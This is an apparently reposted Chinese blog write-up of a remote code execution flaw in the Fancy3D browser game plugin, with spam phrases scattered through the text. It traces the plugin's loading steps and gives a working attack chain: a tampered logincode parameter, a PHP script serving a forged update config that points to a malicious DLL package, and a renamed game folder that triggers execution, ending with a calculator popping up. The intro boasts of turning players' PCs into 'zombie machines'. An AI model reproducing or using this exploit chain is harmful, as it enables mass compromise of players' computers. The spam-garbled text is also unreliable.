黑客技术是什么-黑客怎么盗微信号信息呢-如何拿下几十万热门页游玩家的电脑（Fancy3D游戏引擎远程代码执

hacker 黑客接单 2020-11-11 208 2

*** 黑客怎么盗微信号信息呢-怎样拿到几十万热门页游游戏玩家的电脑上（Fancy三维游戏引擎远程控制编码执

题目一定要性感迷人，系统漏洞种类一定要叼，自我评价rank一定要高那样才会有雷电

这几年网页游戏愈来愈火，有很大的替代电脑网游的发展趋势。从初期的文字类游戏，到之后的js、flash、三维,游戏引擎日渐完善，捞油水方式愈发聪明。光辉的身后，安全隐患却非常少被别人提到。

今日，凡夫俗子就来丢个重磅消息定时炸弹。(没有错我是密名你找的到我么)

你玩XXX么?玩?哦那你是我心中的肉食鸡了

你玩XX么?不玩?那么你玩过XXX么?一年前玩过1分钟?哦那么你也就是我的肉食鸡了

你玩XX么?不玩?XXX都不玩?你是网站渗透是啥开发人员?哦那么你還是我的肉食鸡

下边刚开始很严肃认真的详细描述。哦对大家要3个月后才可以见到嘿嘿怪我咯

北京市寿果灵动科技有限责任公司自主研发的三维网页页面游戏引擎Fancy三维。检测中发觉有主要参数可随意操纵最后完成远程连接命令实行。下列是剖析全过程：

先讨论一下手机游戏载入网页页面这儿选了一款苏州市争渡高新科技有限责任公司游戏开发三国武神

为维持卷子干净整洁，编码有删剪

手机游戏主页面：http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx

//载入中后期配备

//Fancy三维软件起动脚本 ***

this.logincode = (function(){

var box = 'no';

if(_self.platform == 'xunlei'){

try{ window.external.GetClientInfo(); box = 'xunlei';}catch(e){ box = 'no'; }

}

return 网站渗透是啥 'foaparam=lordcrab:\/\/sn=18服\\x26sa=s18.37wan.sgws.ate.cn:3018\\x26tl=1439716841\\x26un=p37_18_xutianle2\\x27cc=某一md5\\x26nc=p37_18_xutianle2\\x26dx=\\x26ndx=\\x27cv=test3\/\\x26api=http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18\\x26xcn=test\\x26xcv=3&xdt=' box '# http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18 a 3 test 1';

}());//logincode形成网站渗透是啥网站渗透是啥下边要说到

先看一下http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18

window.gameversion="1400301";window.TangRen_AutoPatch="http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip";window.fancydownurlx64="http://res.ly.sgws.g.1360.com/static/fancy/down64.dll";window.fancyentryurl="http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe";window.clientversion="1.0";window.versions="1400229";window.fancydownurlx86="http://res.ly.sgws.g.1360.com/static/fancy/down.dll";window.entrymd5="8cbed3568c343907430a7a4c5b1ac428";window.mfc="http://res.ly.sgws.g.1360.com/updateot/mfc.zip";window.TangRenPluginSetUp="网站渗透是啥http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip";window.fancymd5x64="dd6ffd1aedc204efec3a722ec670f176";window.fancymd5x86="aa401a7cb0f487078b75454576eba479";window.version="1.0";

这里边界定了一些复位的配备便捷讲解下边称这一段配备为“配备一”

随后看来起动软件的一部分logic1.2.js

....之上省去....

//-------------------------------------------

//起动寿果软件

function load_fancy_html_obj(){

var attr = _E.browser == 'ie'?'classid="clsid:b2e8d85e-c0c5-48df-8dbc-1359b339ae32"' : 'type="application/fancy-npruntime-fancy3d-plugin"';

var liburl = window.fancydownurlx86网站渗透是啥;

var libmd5 = window.fancymd5x86;

if(_E.browser == 'ie' && _E.platform == 'x64'){

liburl = window.fancydownurlx64;

libmd5 = window.fancymd5x64;

}

var tr_pick_url= 'http://' _G.pickurl '/pick/multiinfo',

tr_createTokenUrl = 'http://' _G.apiHost '/createtoken?token=' _G.tr_网站渗透是啥token,

tr_createTokenKey = 'none',

tr_createTokenName = 'none';

var param1 = _G.username ' ' tr_pick_url ' ' tr_createTokenUrl ' ' tr_createTokenKey ' ' tr_createTokenName ' ' _G.logincode;

var html = '

$("#fancy3d_divbox").html(html);

}

....下列省去....

在其中的关键自变量(意思是假如这一自变量有什么问题，软件就不容易起动或是没法实行下来)有

attr 依据电脑浏览器挑选软件载入 ***

liburl 软件起动后更先免费下载的文档来源于配备一的window.fancydownurlx86

网站渗透是啥

libmd5 说白了上面一个文档的MD5 来源于配备一的window.fancymd5x86

exeurl 手机游戏源程序的详细地址来源于配备一window.fancyentryurl

exemd5 手机游戏源程序md5 来源于配备一的window.entrymd5

param1 一般参数传递这里边较为关键的是_G.logincode 来源于在上面

下边说说观查到的步骤：

1、点开网页页面后，更先载入fancy3d插件

2、软件起动后，在C:\\Users\\客户\\fancy\\下建立文件目录ZDSGGame

3、插件下载liburl(down.dll)并载入

4、插件下载手机游戏源程序SangoWebEntry.exe并起动

5、SangoWebEntry.exe要求logincode中的api获得版本信息

6、SangoWebEntry.exe要求http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18(来源于logincode) 內容以下:

{"gameversion": 网站渗透是啥 "1400301", "TangRen_AutoPatch": "http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http://res.ly.sgws.g.1360.com/static/fancy/down64.dll", "fancyentryurl": "http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe", 网站渗透是啥 "clientversion": "1.0", "versions": "1400229", "fancydownurlx86": "http://res.ly.sgws.g.1360.com/static/fancy/down.dll", "entrymd5": "8cbed3568c343907430a7a4c5b1ac428", "mfc": "http://res.ly.sgws.g.1360.com/updateot/mfc.zip", 网站渗透是啥 "TangRenPluginSetUp": "http://re s.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip", "fancymd5x64": "dd6ffd1aedc204efec3a722ec670f176", "fancymd5x86": "aa401a6cb0f487078b75454576eba479", "version": 黑客技术是什么 "1.0"}

7、SangoWebEntry.exe从上一步请求结果中取出TangRen_AutoPatch地址并下载解压到client目录

8、SangoWebEntry.exe从client目录解压TangRen-AutoPatch5.18.zip并载入TangRen-AutoPatch.dll开始自动更新

9、自动更新完毕进入游戏

从以上流程可以看到如果3 4 6 这几步的内容可被任意控制那就可以下载并执行任意的exe或者dll了

实际测试发现3(liburl) 4(exeurl)这两个参数只要一改域名黑客技术是什么插件就不运行，应该是做了检查了

第6步的下载地址来自http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18

http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18来自logincode

logincode可控而且按照格式修改的话插件可以正确读取加载于是搭建测试环境如下

首先写一个TangRen-AutoPatch.dll 如图

poc而已求不吐槽

然后打包成TangRen-AutoPatch5.18.zip放到web目录下

然后新建一个php文件

if($_GET['type'] == 'gameversion'){ //流程第5步请求的api 图方便我也改成这里了

die('1400301');

}else{

echo '{"gameversion": "1400303", 黑客技术是什么 "TangRen_AutoPatch": "http://localhost/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http://localhost/static/fancy/down64.dll", "fancyentryurl": "http://localhost/static/fancy/SangoWebEntry.exe", "clientversion": "1.1", "versions": 黑客技术是什么 "1400303", "fancydownurlx86": "http://localhost/static/fancy/down.dll", "entrymd5": "9cbed3568c343907430a7a4c5b1ac428", "mfc": "http://localhost/updateot/mfc.zip", "TangRenPluginSetUp": "http://localhost/TangRenPluginSetUp1.4.zip", 黑客技术是什么 "fancymd5x64": "dd6efd1aedc204efec3a722ec670f176", "fancymd5x86": "ba401a6cb0f487078b75454576eba479", "version": "1.0"}';

}

其中最主要的是这段

"TangRen_AutoPatch": "http://localhost/TangRen-AutoPatch5.18.zip"

然后修改一下游戏主页面浏览器打开，然后什么都没有发生。黑客技术是什么。。

继续查看插件log发现TangRen_AutoPatch只会在游戏之一次安装的时候被下载和执行(或者版本更新?这里没研究下去)

需要游戏之一次加载我们就再来看看游戏之一次加载的流程其中第二步

2、插件启动后，在C:\Users\用户\fancy\下创建目录ZDSGGame

这个ZDSGGame是不是很眼熟在游戏加载插件的时候有个game参数的值就是这个

var html = '

抱着试试看的态度把这里的ZDSGGame改成了ZDSGGame1，重新用浏览器打开，等了大概5秒刷的一下就弹出了熟悉的计算器

查看C:\Users\用户\fancy\ 果然生成了ZDSGGame1目录

后黑客技术是什么记：